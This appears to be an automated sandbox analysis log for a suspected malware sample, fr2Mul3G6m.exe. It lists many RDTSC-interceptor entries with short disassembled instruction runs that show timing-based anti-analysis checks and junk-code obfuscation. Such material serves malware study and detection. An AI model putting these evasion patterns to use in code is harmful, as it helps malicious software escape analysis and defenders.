                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52AE1A second address: 52AE5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FBF0920B206h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D2CCEh] 0x00000013 mov edx, eax 0x00000015 push dword ptr [ebp+122D391Eh] 0x0000001b mov edx, edi 0x0000001d call 00007FBF0920B209h 0x00000022 je 00007FBF0920B214h 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52AE5A second address: 52AE82 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007FBF093632F5h 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52AE82 second address: 52AEA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jl 00007FBF0920B206h 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52AEA3 second address: 52AEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FBF093632F4h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52DC86 second address: 52DCA3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF0920B206h 0x00000008 jmp 00007FBF0920B210h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52DCA3 second address: 52DCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FBF093632E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52DCB3 second address: 52DCB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52DCB7 second address: 52DCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF093632EAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52DCC7 second address: 52DD1F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF0920B21Fh 0x00000008 pushad 0x00000009 jbe 00007FBF0920B206h 0x0000000f jmp 00007FBF0920B216h 0x00000014 jmp 00007FBF0920B218h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52D84D second address: 52D866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632ECh 0x00000007 jns 00007FBF093632E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52D866 second address: 52D86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 443A5A second address: 443A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632F7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 443A75 second address: 443A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F0411 second address: 49F042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F046D second address: 49F0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F0471 second address: 49F0475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F0475 second address: 49F047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F047B second address: 49F0481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F0481 second address: 49F0485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 49F0485 second address: 49F0489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A1070F second address: 4A1071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A1071E second address: 4A10736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10736 second address: 4A1073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A1073A second address: 4A10758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBF093632EEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10758 second address: 4A1075C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A1075C second address: 4A10762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10762 second address: 4A107B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 call 00007FBF0920B217h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007FBF0920B20Fh 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop eax 0x0000001c jmp 00007FBF0920B217h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A107B2 second address: 4A10861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1DBAh 0x00000007 mov ax, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FBF093632ECh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBF093632EEh 0x0000001b add ax, 2E28h 0x00000020 jmp 00007FBF093632EBh 0x00000025 popfd 0x00000026 movzx esi, bx 0x00000029 popad 0x0000002a push ebp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FBF093632EEh 0x00000032 xor eax, 35D7E088h 0x00000038 jmp 00007FBF093632EBh 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007FBF093632F8h 0x00000044 xor eax, 13EE42E8h 0x0000004a jmp 00007FBF093632EBh 0x0000004f popfd 0x00000050 popad 0x00000051 mov dword ptr [esp], esi 0x00000054 pushad 0x00000055 call 00007FBF093632F4h 0x0000005a mov bh, al 0x0000005c pop ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f movzx esi, bx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10861 second address: 4A10875 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, bx 0x00000010 mov si, dx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10875 second address: 4A108A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov esi, 435FB8F9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FBF093632F4h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBF093632EEh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A108A8 second address: 4A108AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A108AE second address: 4A108B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A108B2 second address: 4A108CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A108CB second address: 4A108D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A108D1 second address: 4A108D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10942 second address: 4A10976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBF093632F7h 0x00000008 pop esi 0x00000009 mov dx, 95FCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov esi, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBF093632EEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10976 second address: 4A1097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A1097C second address: 4A10980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A109CC second address: 4A001BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FBF0920B210h 0x0000000f leave 0x00000010 jmp 00007FBF0920B210h 0x00000015 retn 0004h 0x00000018 nop 0x00000019 cmp eax, 00000000h 0x0000001c setne al 0x0000001f jmp 00007FBF0920B202h 0x00000021 xor ebx, ebx 0x00000023 test al, 01h 0x00000025 jne 00007FBF0920B207h 0x00000027 sub esp, 04h 0x0000002a mov dword ptr [esp], 0000000Dh 0x00000031 call 00007FBF0D998963h 0x00000036 mov edi, edi 0x00000038 jmp 00007FBF0920B211h 0x0000003d xchg eax, ebp 0x0000003e jmp 00007FBF0920B20Eh 0x00000043 push eax 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007FBF0920B211h 0x0000004b sbb eax, 4B4E4346h 0x00000051 jmp 00007FBF0920B211h 0x00000056 popfd 0x00000057 push eax 0x00000058 push edx 0x00000059 mov bl, ah 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A001BA second address: 4A00201 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FBF093632F2h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FBF093632F0h 0x00000015 sub esp, 2Ch 0x00000018 jmp 00007FBF093632F0h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00201 second address: 4A00205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00205 second address: 4A0020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0020B second address: 4A00233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBF0920B211h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF0920B20Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00233 second address: 4A0024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0024F second address: 4A00253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00253 second address: 4A00259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00259 second address: 4A00277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 4E67h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF0920B20Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00277 second address: 4A0028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0028F second address: 4A002B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF0920B214h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00317 second address: 4A003B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FBF093632F7h 0x00000010 sub edi, edi 0x00000012 jmp 00007FBF093632EFh 0x00000017 inc ebx 0x00000018 jmp 00007FBF093632F6h 0x0000001d test al, al 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FBF093632EEh 0x00000026 sbb ah, 00000068h 0x00000029 jmp 00007FBF093632EBh 0x0000002e popfd 0x0000002f mov dx, cx 0x00000032 popad 0x00000033 je 00007FBF09363463h 0x00000039 jmp 00007FBF093632F2h 0x0000003e lea ecx, dword ptr [ebp-14h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003B3 second address: 4A003B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003B9 second address: 4A003BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003BF second address: 4A003C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003C3 second address: 4A003C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003C7 second address: 4A003D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003D8 second address: 4A003DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A003DE second address: 4A003E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 70h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00431 second address: 4A00435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00435 second address: 4A00448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00448 second address: 4A0044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0044E second address: 4A00452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A004D4 second address: 4A004E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A004E9 second address: 4A0056A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007FBF0920B20Dh 0x00000010 jne 00007FBF7B8991A0h 0x00000016 jmp 00007FBF0920B20Eh 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e jmp 00007FBF0920B210h 0x00000023 lea eax, dword ptr [ebp-2Ch] 0x00000026 jmp 00007FBF0920B210h 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FBF0920B218h 0x00000035 sub ax, B8E8h 0x0000003a jmp 00007FBF0920B20Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0056A second address: 4A0058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0058E second address: 4A005A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A005A8 second address: 4A005BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A005BA second address: 4A005C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov eax, edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A005C8 second address: 4A00661 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF093632EFh 0x00000008 add si, 6B9Eh 0x0000000d jmp 00007FBF093632F9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007FBF093632EAh 0x0000001e push eax 0x0000001f jmp 00007FBF093632EBh 0x00000024 nop 0x00000025 jmp 00007FBF093632F6h 0x0000002a xchg eax, ebx 0x0000002b jmp 00007FBF093632F0h 0x00000030 push eax 0x00000031 jmp 00007FBF093632EBh 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FBF093632F5h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00020 second address: 4A0003B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0003B second address: 4A00067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF093632ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00067 second address: 4A000A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF0920B211h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FBF0920B20Ch 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF0920B217h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000A8 second address: 4A000AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000AE second address: 4A000D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov eax, 4F6C2FDBh 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000D0 second address: 4A000D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000D4 second address: 4A000DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000DA second address: 4A000F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF093632F7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A000F6 second address: 4A0011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007FBF0920B214h 0x0000000d mov dword ptr [ebp-04h], 55534552h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A0011F second address: 4A00123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00123 second address: 4A00127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00127 second address: 4A0012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
